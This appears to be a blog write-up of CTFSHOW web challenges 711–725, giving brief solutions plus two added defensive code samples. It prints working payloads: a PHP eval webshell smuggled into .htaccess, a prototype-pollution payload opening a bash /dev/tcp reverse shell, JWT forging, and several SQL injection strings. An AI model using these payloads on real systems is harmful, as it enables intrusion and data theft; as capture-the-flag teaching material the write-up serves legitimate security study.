CTFSHOW "original challenges" series (web711-web725)

Because there are many challenges, many parts are written rather briefly. I hope the experts will bear with me.


Scanning the directory found robots.txt, which points to a secret key txt file under static/.
Accessing it gives the string ctfshow_love_you.
Then go to the normal page: there is a login and a registration form. Register any user, log in, and you find a file upload point.
However, an uploaded file with a php suffix is not parsed, so this is probably not meant to be solved by writing PHP.
Take a look at the session cookie: it is a JWT. That's easy: forge an admin user, and the signing secret should be the string we just obtained.

After modifying the session, you can see a flag.jpg picture; the flag is in the picture.


This challenge mainly tests exploitation of .htaccess files.
The general flow is as follows:
delete all files except index.php -> write the file -> delete all files except index.php.
Although the content is filtered, we can bypass the filter by wrapping the line.
For example, the following two contents have the same effect:

php_value auto_append_file "/etc/passwd"
php_value auto_append_fil\
e "/etc/passwd"

But we have no shell file to include. All we have is index.php and the .htaccess file we upload ourselves, and index.php is actually useless,
so we can only work with the .htaccess file.
We can write the webshell we use into the .htaccess file itself; so that it does not break the file as configuration, it has to be commented out with a #. Then include the file itself, i.e.

php_value auto_append_fil\
e ".htaccess"
#<?php eval($_POST[1]);?>

But in the end another string beginning with \n gets appended to the file, and there is only one chance, so one more trailing \ takes care of it.

php_value auto_prepend_fil\
e ".htaccess"
#<?php eval($_POST[1]);?>\

URL-encode it.

Then visit /index.php and use the one-line webshell.
Note that this is one-time, so don't GET first and then POST; you need to POST the value directly.
Of course, there are other ways; see the reference articles.
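The line-wrapping bypass described above, seen from the filter's side, as an added example that is not from the writeup: a naive keyword check on the raw upload misses `auto_prepend_fil\` + newline + `e`, while a check that first joins continuation lines the way Apache does sees the real directive. The denylist and the sample upload are constructed assumptions.

```javascript
// Added example (not from the writeup): why a naive keyword filter on uploaded .htaccess
// content misses the backslash line-continuation trick, and a normalizing check that catches it.
// The directive names are Apache/PHP ones; the denylist itself is an assumption.

const BLOCKED = ['auto_prepend_file', 'auto_append_file'];

// Naive check: looks for the directive names in the raw bytes as uploaded.
function naiveFilter(text) {
  return BLOCKED.some((d) => text.includes(d));
}

// Apache joins a line ending in "\" with the following line before it parses directives,
// so the check must look at the same text Apache will. A lone trailing "\" is dropped too.
function normalizeHtaccess(text) {
  return text
    .replace(/\r\n/g, '\n')
    .replace(/\\\n/g, '')        // join continuation lines, as Apache does
    .replace(/\\$/, '');         // trailing "\" with nothing after it
}

function normalizedFilter(text) {
  return naiveFilter(normalizeHtaccess(text));
}

// Constructed sample in the wrapped form shown in the writeup.
const WRAPPED = 'php_value auto_prepend_fil\\\ne ".htaccess"\n';
// Constructed sample in plain form, which even the naive check sees.
const PLAIN = 'php_value auto_append_file "/etc/passwd"\n';

function demo() {
  return {
    naiveMissesWrapped: naiveFilter(WRAPPED) === false,
    normalizedCatchesWrapped: normalizedFilter(WRAPPED) === true,
    joined: normalizeHtaccess(WRAPPED),   // 'php_value auto_prepend_file ".htaccess"\n'
    plainCaughtByBoth: naiveFilter(PLAIN) && normalizedFilter(PLAIN),
  };
}
```

Normalizing before matching closes this particular gap; the robust fix is not to honour user-uploaded .htaccess files at all (AllowOverride None for the upload directory).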


A cryptography problem... let's have a look. Come on.


Prototype chain pollution.
The vulnerable point is the following place, where more than five need to be added.

For the detailed analysis of the principle see https://xz.aliyun.com/t/6113 and the official writeup.

        "constructor": {
            "prototype": {
            "outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"');var __tmp2"

After sending the request, visit /render to get the reverse shell.
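The merge behaviour behind the `constructor.prototype` payload above, as an added example that is not from the writeup: a recursive merge that follows inherited keys lets one request body write into Object.prototype, and a merge that refuses the three prototype-reaching names does not. The request body is constructed with a harmless marker value in place of the writeup's command; outputFunctionName is the EJS option the writeup's payload targets.

```javascript
// Added example (not from the writeup): how the recursive merge behind this challenge lets a
// "constructor.prototype.*" key pollute Object.prototype, and a merge that refuses such keys.
// The request body is constructed; the value is a harmless marker, not the writeup's command.

// Vulnerable pattern: recursive merge that walks inherited keys such as "constructor".
function unsafeMerge(target, source) {
  for (const key in source) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      if (!(key in target)) target[key] = {};   // "constructor" IS in {} (inherited) -> Object
      unsafeMerge(target[key], source[key]);    // ... then "prototype" -> Object.prototype
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

const DANGEROUS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened merge: own keys only, never follow the three prototype-reaching names,
// and only recurse into plain objects the target itself owns.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (DANGEROUS.has(key)) continue;
    const val = source[key];
    if (typeof val === 'object' && val !== null && !Array.isArray(val)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || typeof target[key] !== 'object') {
        target[key] = {};
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Constructed request body shaped like the writeup's payload, with a marker value.
const BODY = '{"constructor":{"prototype":{"outputFunctionName":"polluted"}}}';

// Returns what a fresh, unrelated object sees after the given merge, then cleans up.
function demo(merge) {
  merge({}, JSON.parse(BODY));
  const leaked = ({}).outputFunctionName;
  delete Object.prototype.outputFunctionName;
  return leaked;   // 'polluted' for unsafeMerge, undefined for safeMerge
}
```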


Pass any name, then capture the request and notice that a new HTML page is returned.

This should be the HP and speed values used in the battle.
We copy this code and modify the HP or speed locally, then run it and check the value of payload. After computing its sha256, send it to get the flag.

But testing shows the payload is different every time and does not succeed every time, so just try a few more times.
If your own setting doesn't work, just use mine.



Combining writeups found online with asking the group leader,
the final payload is:

     curl --request POST \
     --url http://97020164-cc45-4c3c-9e71-c0de83ca2e07.challenge.ctf.show/convert/markdown \
     --header 'Content-Type: multipart/form-data' \
     --form files=@index.html \
     -o result.pdf

where the content of index.html is

<h1 id=demo>CTF is my life :D!</h1>
<script>
  var loc = window.location.pathname;
  document.getElementById("demo").innerHTML = loc.substring(0, loc.lastIndexOf('/'))
</script>
<iframe src="/gotenberg/flag"></iframe>




Final payload


The more troublesome part is this line: eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
This function can be truncated with %00.
Then this check, if (!strcmp($c[1], $d) && $c[1]==$d), can be bypassed with arrays.


Similar to web10.
But this challenge gives very little and the source code is unknown; I only roughly know the content from the original challenge.....
The original challenge uses uname and pwd,
while this one is given user and pass.
uname=1'||1 group by pass with rollup limit 1 offset 1#&pwd=




View the source code with hint

 <!-- CTFSHOW hint: 
      if (($row[pass]) && (!strcasecmp(md5($pass), $row[pass]))) {
              echo "<p>Logged in! ".$flag." </p>";

The md5 of the password we enter must equal the md5 stored in the database. You can forge the md5 directly with a union select and then send the corresponding string.
For example, if we want to send password=1, the md5 of 1 goes after the union select.

password=1&username=1' union select 'c4ca4238a0b923820dcc509a6f75849b'%23


 <!-- CTFSHOW hint: 
          foreach ($_GET as $key => $value)
            $$key = $$value;
          foreach ($_POST as $key => $value)
            $$key = $value;
          if ( $_POST["flag"] !== $flag )
          echo "This is your flag : ". $flag . "\n";

Checking the source code, the hint shows a variable overwrite.


In that case


Finally, the flag is output through die($success)


The final constructed statement is similar to
select * from user where username='\' and password='||1#'
Equivalent to
select * from user where username='xxx'||1#'




Update injection.
For instance:

So we can construct

table_name=user` set user=1 or updatexml(2,concat(0x7e,(database())),0)%23

Final payload

table_name=user` set user=1 or updatexml(2,concat(0x7e,(select group_concat(secret) from ctfshow_secret)),0)%23

table_name=user` set user=1 or updatexml(2,concat(0x7e,(select right(group_concat(secret),30) from ctfshow_secret)),0)%23

Concatenating the two parts gives the complete flag.

Keywords: PHP security Web Security

Added by slyte33 on Sun, 27 Feb 2022 13:22:34 +0200